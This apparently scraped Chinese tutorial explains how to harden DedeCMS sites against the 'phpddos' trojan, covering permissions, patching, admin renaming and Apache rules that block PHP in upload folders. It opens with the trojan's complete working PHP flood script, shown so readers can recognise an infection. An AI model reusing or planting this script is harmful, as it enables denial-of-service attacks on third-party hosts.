dedecms防DDOS挂马漏洞的解决方法

我们可能中过phpddos的朋友对下面的代码不陌生吧

<?php
header("charset='utf-8'");
error_reporting(0);
set_time_limit(0);
ignore_user_abort(TRUE);
$ip = $_GET['ip'];
$port = $_GET['port'];
$exec_time =time()+$_GET['time'];
$byte = 0;
$true = 1;
while($true) {
 $byte++;
 if(time() >$exec_time) {
  break;
 }
 $fp = fsockopen("tcp://$ip",$port,$errno,$errstr,0);
 if($fp) {
  fwrite($fp,$byte);
  fclose($fp);
 }
}
?>

那么证明你的电脑中毒了,下面我总结了解决再次中phpddos的办法

1 dedecms目录的安全设置

目录权限

我们不建议用户把栏目目录设置在根目录,原因是这样进行安全设置会十分的麻烦,在默认的情况下,安装完成后,目录设置如下:
(1) data、templets、uploads、a或5.3的html目录,设置可读写,不可执行的权限;
(2) 不需要专题的,建议删除special 目录,需要可以在生成HTML后,删除special/index.php 然后把这目录设置为可读写,不可执行的权限;
(3) include、member、plus、后台管理目录设置为可执行脚本,可读,但不可写入(安装了附加模块的,book、ask、company、group 目录同样如此设置)。

2网站程序安全:这也是最根本的防范,如果是虚拟空间建议找专业做网站安全维护的来给做网站程序的安全,只有网站安全了才能带来安全稳定的客户源。

3程序的更新: 打开dedecms后台看看有没有更新的补丁,如果有请及时的更新和打补丁,如果自己的版本很老了,我建议重新安装新的版本,因为新的版本都是比较安全的,有很多地方和老版本的不一样。
4后台管理目录:dedecms后台管理目录一般默认是dedecms,很多站长从来不在乎这个后台地址,我很负责任的告诉大家,管理的目录地址如果是默认的那你被挂马的几率那就是%100.建议把目录的名字改成一些数字加字母符号组合的名字。

5 FTP 网站管理密码: FTP密码和网站管理密码建议经常修改,因为很多黑客都在用暴力破解密码,把密码改的复杂些尽量掺杂着特殊符合和字母。

6、以下目录:data、templets、uploads、a设置可读写不可执行权限。其中a目录为文档HTML默认保存路径,可以在后台进行更改;

7、以下目录:include、member、plus、dede设置为可读可执行不可写入权限。其中后台管理目录(默认dede),可自行修改;

8、如果不需要使用会员、专题,可以直接删除member、special目录;

9、删除install安装目录;

10、管理员帐号密码尽量设置复杂,发布文章可以新建频道管理员,并且只给予相关权限;

11、Mysql数据库链接,不使用root用户,单独建立新用户,并给予:SELECT、INSERT、UPDATE、DELETE、CREATE、DROP、INDEX、ALTER、CREATE TEMPORARY TABLES权限;

12、定期进行备份网站目录和数据库,并在后台进行文件校验、病毒扫描、系统错误修复

服务器权限配置

 

首先复制下权限


设置目录为只读权限


 

3.2设置目录不允许执行脚本


 

此外还需要注意问题是,不管IIS还是Apache都不要把.php和.inc文件加入mime中,这样系统会禁止下载这些文件。
 

 

4Apache站点安全设置
如果是Windows2003下,可以对Apache进行如下操作:
    4.1在计算机管理里的本地用户和组里面创建一个帐户,例如:DedeApache,密码设置为DedeApachePWD,加入guests组(如果出现问题,可以赋予user权限);

    4. 2 打开开始->管理工具->本地安全策略,在“用户权限分配”中选择“作为服务登陆”,添加DedeApache用户;

    4.3.计算机管理里面选择服务,找到apache2.2,先停止服务,右击->属性,选择登陆,把单选框从本地系统帐户切换到此帐户,然后查找选择DedeApache,输入密码DedeApachePWD,然后点确定(这个时候apache还不能正常启动,一般情况肯定会报错:Apache2.2 服务因1 (0x1) 服务性错误而停止。);

 


 

    4.4.赋予apache安装目录(比如:D:/apache2.2)以及web目录(比如D:/wwwroot)DedeApache帐号的可读写权限,去除各磁盘根目录除administror与system以外的所有权限,赋予DedeApache安装目录所在的磁盘根目录apache帐户的可读取列目录权限

 

 


 

 在你apache的站点目录中禁止php运行机制

 代码如下 复制代码
<Directory "D:dedecmswwwuploads">
    <FilesMatch ".php">
        Order Allow,Deny
        Deny from all
    </FilesMatch>
</Directory>
<Directory "D:dedecmswwwdata">
    <FilesMatch ".php">
        Order Allow,Deny
        Deny from all
    </FilesMatch>
</Directory>
<Directory "D:dedecmswwwtemplets">
    <FilesMatch ".php">
        Order Allow,Deny
        Deny from all
    </FilesMatch>
</Directory>
<Directory "D:dedecmswwwa">
    <FilesMatch ".php">
        Order Allow,Deny
        Deny from all
    </FilesMatch>
</Directory>

最后我们把dedecms缓存目录放到站外去

时间: 2024-09-16 08:54:29

dedecms防DDOS挂马漏洞的解决方法的相关文章

分享dedecms DDOS挂马漏洞的解决方法

中介交易 http://www.aliyun.com/zixun/aggregation/6858.html">SEO诊断 淘宝客 云主机 技术大厅 到年底了,不知不觉过的太快了,最近俺的几个网站受到了机房的严重警告,让我意想不到的是,机房那面竟然说我的网站被挂马了,网站流量总是不断的往外发包,怎么也想不通,网站都稳定运行了好几年了,从没遇到过被挂马这一说,于是我整整工作了三天三夜终于把问题的根源找到了,也是本文的标题 "dedecms ddos挂马漏洞的解决办法"所要

织梦dedecms经常被挂马问题的解决办法

有两个织梦企业站,长期以来一直被挂马.搜索百度都找不到哪里封住漏洞. 后来我自己做实验找到了常被木马的入口.把入口文件删了就行了额. 删了这个文件,观察了好久多没有被挂木马.现在分享给大家. 删除 /plus/ad_js.php /plus/mytag_js.php 两个文件. 注意删除了这两个文件js调用tag和广告就有问题,可以直接用标签调用. 补充:第一.安装的时候数据库的表前缀,最好改一下,不用dedecms默认的前缀dede_,可以改成ljs_,随便一个名称即可. 第二.后台登录开启验

网站被挂马怎么办:排名恢复方法

中介交易 SEO诊断 淘宝客 云主机 技术大厅 网站被攻击和挂马是导致网站排名消失的原因之一,也是最常见的原因.近日,服务器老是被攻击导致网站被挂马,网站排名也随之消失.注意不是下降,是直接从首页掉到100名以后.在这里跟大家分享一下被挂马原因.解决方法和注意事项. 网站被挂马原因解析 网站被挂马一般来说有两方面原因: 1.服务器出现漏洞,被攻击. 2.网站程序存在缺陷被攻击. 一个服务器上可以有上百个甚至上千个网站,所以服务器出问题的概率要远远小于网站.大多数网站被挂马都是网站程序缺陷造成的,

安卓曝高危挂马漏洞,360、UC浏览器成重灾区

尽管使用"瞒天过海"的公关手段是奇虎360的惯用伎俩,但此次借助"安卓挂马漏洞"恶意抹黑竞争对手.意图掩饰自家产品问题的行为,却并没有得逞. 9月6日,乌云漏洞平台官方微博发布提醒,安卓应用挂马漏洞比想象中更严重,指出此前指责竞品存在漏洞问题的360手机浏览器同样存在问题,并提醒奇虎360官方尽快修复更新.随后,安全联盟官方微博作出回应,提醒安卓手机用户警惕中招. &http://www.aliyun.com/zixun/aggregation/37954.

近期,微信等多款安卓流行应用曝出高危挂马漏洞

   奇虎360 昨日发布风险警示,近期,微信等多款安卓流行应用曝出高危"挂马漏洞":只要点击好友消息或朋友圈中的一条网址,手机就会自动执行黑客指令,出现被安装恶意扣费软件.向好友发送欺诈短信.通讯录和短信被窃取等严重后果.包括安卓版微信.QQ. 腾讯 微博.QQ浏览器.快播. 百度 浏览器.金山浏览器等大批应用均被曝光同类型漏洞. 挂马漏洞的说法源于"挂马攻击".挂马攻击是指攻击者在获取网站控制权之后,通过篡改网站的网页内容,在页面中嵌入恶意代码.360安全中心监

安卓版微信QQ曝挂马漏洞

中介交易 http://www.aliyun.com/zixun/aggregation/6858.html">SEO诊断 淘宝客 云主机 技术大厅 本报讯(记者 张倩怡)奇虎360(84.2, 2.41, 2.95%)昨日发布风险警示,近期,微信等多款安卓流行应用曝出高危"挂马漏洞":只要点击好友消息或朋友圈中的一条网址,手机就会自动执行黑客指令,出现被安装恶意扣费软件.向好友发送欺诈短信.通讯录和短信被窃取等严重后果.包括安卓版微信.QQ.腾讯(389.6, 2.0

php Y2K38漏洞的解决方法

Y2K38,又称 Unix Millennium Bug, 此漏洞将会影响到所有 32 位系统下用 UNIX 时间戳整数来记录时间的 PHP,及其它编程语言. 一个整型的变量所能保存的最大时间为 2038 年 1 月 19 日 03:14:07.超过这个时间后,整型数值将会溢出. 从 1970 年 01 月 01 日开始,到世界标准时 2038 年 01 月 19 日星期二凌晨 03:14:07 超过 2^31 – 1.2^31 – 1 就是 0x7FFFFFFF,相信很多编程员都看过,在 32

dedecms防止被挂马必看安全知识

一.挂马前的安全措失 A.改更默认管理目录dede. B.检查install目录里是否存在install.lock文件.有用户没给install目录写权限导致安装的时候没有生成lock文件.安装完成后可整个删除intstall目录. C.关注后台更新通知,检查是否打上最新dedeCMS补丁 D.服务器web目录权限设置 有条件的用户把DedeCms中 data.templets.uploads.html.special.images.install目录设置为不允许执行脚本,其它目录禁止写入,系统

CSS挂马及相应防范方法

用来制作网页特效的CSS代码,也可以用来挂马.   随着Web2.0的普及,各种网页特效用得越来越多,这也给黑客一个可乘之机.他们发现,用来制作网页特效的CSS代码,也可以用来挂马.而比较讽刺的是,CSS挂马方式其实是从防范E挂马的CSS代码演变而来. 网站挂马的手段最初非常单一,但是随着Web2.0技术以及Blog.Wiki等广泛的应用,挂马也涌现出各种各样的技术,其中CSS挂马方式,可以说是Web2.0时代黑客的最爱.有许多非常著名的网站都被黑客用CSS挂马入侵过. 建议大家在点击陌生链接时